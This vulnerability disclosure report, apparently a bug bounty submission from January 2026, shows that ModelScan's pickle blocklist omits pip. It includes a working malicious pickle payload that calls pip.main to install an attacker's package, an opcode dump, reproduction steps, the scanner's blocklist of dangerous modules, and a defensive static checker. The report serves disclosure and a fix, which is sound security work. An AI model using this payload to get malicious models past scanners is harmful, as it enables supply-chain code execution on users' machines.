HUNTR MFV SUBMISSION - ModelScan pip.main() Bypass
Target Format
Pickle (.pkl) → Python
Title
ModelScan Scanner Bypass via pip.main() - Missing Blocklist Entry
HuggingFace PoC
https://huggingface.co/kfoughali/mfv-modelscan-pickle-bypass
Files:
- scanner_bypass_poc.pkl (54 bytes) - Safe demo (pip --help)
- scanner_bypass_rce.pkl (89 bytes) - RCE variant
Description
Vulnerability Summary
ModelScan 0.8.7 (latest version) does NOT include pip in its blocklist of unsafe modules. This allows an attacker to create a malicious pickle file that:
- Passes ModelScan security checks → Reports "No issues found"
- Executes arbitrary code → Via pip.main(['install', 'malicious-package'])
- Enables supply chain attacks → Malicious models appear safe
This is the same class of vulnerability as CVE-2025-1716 (picklescan pip.main() bypass), but affects ModelScan which is used by ProtectAI and integrated into security pipelines.
Category
- Techniques that trick or evade automated scanners, allowing malicious model files to go undetected.
Proof of Bypass
ModelScan Output
$ modelscan --version
modelscan, version 0.8.7
$ modelscan --path scanner_bypass_poc.pkl
Scanning scanner_bypass_poc.pkl using modelscan.scanners.PickleUnsafeOpScan
--- Summary ---
No issues found! 🎉
ModelScan Blocklist (Missing pip)
Current blocklist in modelscan/settings.py:
"CRITICAL": {
    "__builtin__": [
        "eval",
        "compile",
        "getattr",
        "apply",
        "exec",
        "open",
        "breakpoint",
        "__import__",
    ],
    "builtins": [
        "eval",
        "compile",
        "getattr",
        "apply",
        "exec",
        "open",
        "breakpoint",
        "__import__",
    ],
    "runpy": "*",
    "os": "*",
    "nt": "*",
    "posix": "*",
    "socket": "*",
    "subprocess": "*",
    "sys": "*",
    "operator": [
        "attrgetter",
    ],
    "pty": "*",
    "pickle": "*",
    "_pickle": "*",
    "bdb": "*",
    "pdb": "*",
    "shutil": "*",
    "asyncio": "*",
    # NOTE: "pip" is MISSING from this list!
},
Code Execution Proof
import pickle

# Loading the PoC executes pip.main()
with open('scanner_bypass_poc.pkl', 'rb') as f:
    pickle.load(f)  # Executes: pip install --help
Technical Details
The Payload
import pickle


class PipBypassRCE:
    def __reduce__(self):
        import pip
        return pip.main, (['install', 'malicious-package'],)


# Create malicious pickle
payload = pickle.dumps(PipBypassRCE(), protocol=4)
Pickle Opcodes
0: \x80 PROTO 4
11: \x8c SHORT_BINUNICODE 'pip' <- Module not in blocklist
17: \x8c SHORT_BINUNICODE 'main' <- Function to call
24: \x93 STACK_GLOBAL <- pip.main
29: \x8c SHORT_BINUNICODE 'install' <- Arguments
51: R REDUCE <- Call pip.main(['install', ...])
Attack Vector
- Attacker creates malicious PyPI package with RCE in setup.py
- Attacker creates pickle that calls pip.main(['install', 'malicious-pkg'])
- Pickle passes ModelScan security checks
- Victim loads pickle → pip installs malicious package → RCE
Impact
| Impact | Description |
|---|---|
| Scanner Bypass | ModelScan 0.8.7 reports "No issues found" |
| Code Execution | Arbitrary code runs via pip install hooks |
| Supply Chain | Malicious models appear safe on model hubs |
| Wide Scope | Affects all ModelScan users (ProtectAI ecosystem) |
Related Vulnerabilities
- CVE-2025-1716: Same vulnerability in picklescan (patched in 0.0.22)
- ModelScan has NOT patched this yet
Reproduction Steps
Prerequisites
pip install modelscan
Step 1: Verify Scanner Bypass
modelscan --path scanner_bypass_poc.pkl
# Expected: "No issues found! π"
Step 2: Verify Code Execution
import pickle

with open('scanner_bypass_poc.pkl', 'rb') as f:
    pickle.load(f)  # Will show pip install help
Recommended Fix
Add pip to ModelScan's blocklist in modelscan/settings.py:
"CRITICAL": {
    "__builtin__": [
        "eval",
        "compile",
        "getattr",
        "apply",
        "exec",
        "open",
        "breakpoint",
        "__import__",
    ],
    "builtins": [
        "eval",
        "compile",
        "getattr",
        "apply",
        "exec",
        "open",
        "breakpoint",
        "__import__",
    ],
    "runpy": "*",
    "os": "*",
    "nt": "*",
    "posix": "*",
    "socket": "*",
    "subprocess": "*",
    "sys": "*",
    "operator": [
        "attrgetter",
    ],
    "pty": "*",
    "pickle": "*",
    "_pickle": "*",
    "bdb": "*",
    "pdb": "*",
    "shutil": "*",
    "asyncio": "*",
    "pip": "*",  # <-- ADD THIS LINE
},
This matches the fix applied to picklescan for CVE-2025-1716.
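To make the opcode dump above and the blocklist fix concrete, here is an added static check (example code written for this write-up, not ModelScan's own scanner; the function names and the sample pickles are constructed for it). It walks a pickle's opcode stream with pickletools, resolves every global the stream would import (GLOBAL/INST in older protocols, STACK_GLOBAL in protocol 4, which is how the PoC references pip.main) and reports which of them the blocklist covers. It never calls pickle.load, so it is safe to run over untrusted files, and it shows the same file being passed with the 0.8.7 list and flagged once "pip": "*" is added.

```python
import pickle
import pickletools
from typing import Dict, List, Tuple, Union

Blocklist = Dict[str, Union[str, List[str]]]

# The CRITICAL blocklist quoted above from modelscan 0.8.7 (modelscan/settings.py).
# "*" blocks every attribute of the module; a list blocks only the named attributes.
BLOCKLIST_087: Blocklist = {
    "__builtin__": ["eval", "compile", "getattr", "apply", "exec", "open",
                    "breakpoint", "__import__"],
    "builtins": ["eval", "compile", "getattr", "apply", "exec", "open",
                 "breakpoint", "__import__"],
    "runpy": "*", "os": "*", "nt": "*", "posix": "*", "socket": "*",
    "subprocess": "*", "sys": "*", "operator": ["attrgetter"], "pty": "*",
    "pickle": "*", "_pickle": "*", "bdb": "*", "pdb": "*", "shutil": "*",
    "asyncio": "*",
}

# The same list with the proposed fix applied.
BLOCKLIST_FIXED: Blocklist = {**BLOCKLIST_087, "pip": "*"}

# Opcodes that push a string onto the stack (STACK_GLOBAL consumes two of them).
_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
               "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def extract_globals(data: bytes) -> List[Tuple[str, str]]:
    """Return every (module, name) the pickle would import, without loading it.

    GLOBAL and INST carry "module name" in their argument (protocols 0-3).
    STACK_GLOBAL (protocol 4+) takes module and name from the two most recent
    string pushes; MEMOIZE/BINPUT between those pushes leave the stack alone,
    so tracking the string pushes in order is enough to resolve it.
    """
    found: List[Tuple[str, str]] = []
    strings: List[str] = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in _STRING_OPS:
            strings.append(str(arg))
        elif op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(strings) < 2:
                raise ValueError("STACK_GLOBAL without two preceding string pushes")
            found.append((strings[-2], strings[-1]))
    return found


def is_blocked(module: str, name: str, blocklist: Blocklist) -> bool:
    """True if the blocklist covers module.name ('*' means the whole module)."""
    entry = blocklist.get(module)
    if entry is None:
        return False
    return entry == "*" or name in entry


def scan_pickle(data: bytes, blocklist: Blocklist) -> List[str]:
    """Dotted names imported by the pickle that the given blocklist flags."""
    return [f"{m}.{n}" for m, n in extract_globals(data)
            if is_blocked(m, n, blocklist)]


# Constructed samples; none of them is ever passed to pickle.load().
# Protocol 4 pickle that resolves pip.main through STACK_GLOBAL and calls it
# with an empty tuple (the same opcode shape as the PoC's opcode dump above).
PIP_MAIN_PICKLE = (b"\x80\x04"           # PROTO 4
                   b"\x8c\x03pip\x94"    # SHORT_BINUNICODE 'pip', MEMOIZE
                   b"\x8c\x04main\x94"   # SHORT_BINUNICODE 'main', MEMOIZE
                   b"\x93\x94"           # STACK_GLOBAL -> pip.main, MEMOIZE
                   b")R\x94.")           # EMPTY_TUPLE, REDUCE, MEMOIZE, STOP
# Protocol 2 pickle that uses the older GLOBAL opcode ("os\ngetcwd\n").
OS_GETCWD_PICKLE = b"\x80\x02cos\ngetcwd\n)R."
# An ordinary data-only pickle, the shape a real checkpoint mostly consists of.
BENIGN_PICKLE = pickle.dumps({"weights": [0.5, -1.25], "epoch": 3}, protocol=4)


if __name__ == "__main__":
    for label, blob in (("pip.main", PIP_MAIN_PICKLE),
                        ("os.getcwd", OS_GETCWD_PICKLE),
                        ("benign", BENIGN_PICKLE)):
        print(f"{label:10} globals={extract_globals(blob)} "
              f"0.8.7={scan_pickle(blob, BLOCKLIST_087)} "
              f"fixed={scan_pickle(blob, BLOCKLIST_FIXED)}")
```

Run stand-alone it prints that the pip.main sample is clean under the 0.8.7 list and flagged under the fixed one, while the os.getcwd sample is flagged by both. The design point the report makes applies to this checker too: any module absent from the dictionary passes silently, so a denylist only ever catches the entries someone remembered to add. Allowlisting the handful of globals a given framework's checkpoints legitimately reference, or shipping weights in a code-free format such as safetensors, closes the class of bug rather than this one instance.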
Files Provided
| File | Size | Description |
|---|---|---|
| scanner_bypass_poc.pkl | 54 B | Safe PoC (pip --help) |
| scanner_bypass_rce.pkl | 89 B | RCE variant |
References
- CVE-2025-1716: https://nvd.nist.gov/vuln/detail/CVE-2025-1716
- GHSA-655q-fx9r-782v: https://github.com/advisories/GHSA-655q-fx9r-782v
- ModelScan: https://github.com/protectai/modelscan
- Sonatype Research: https://www.sonatype.com/blog/bypassing-picklescan-sonatype-discovers-four-vulnerabilities
Researcher: Karim Foughali
Email: kfoughali@dzlaws.org
Date: January 2026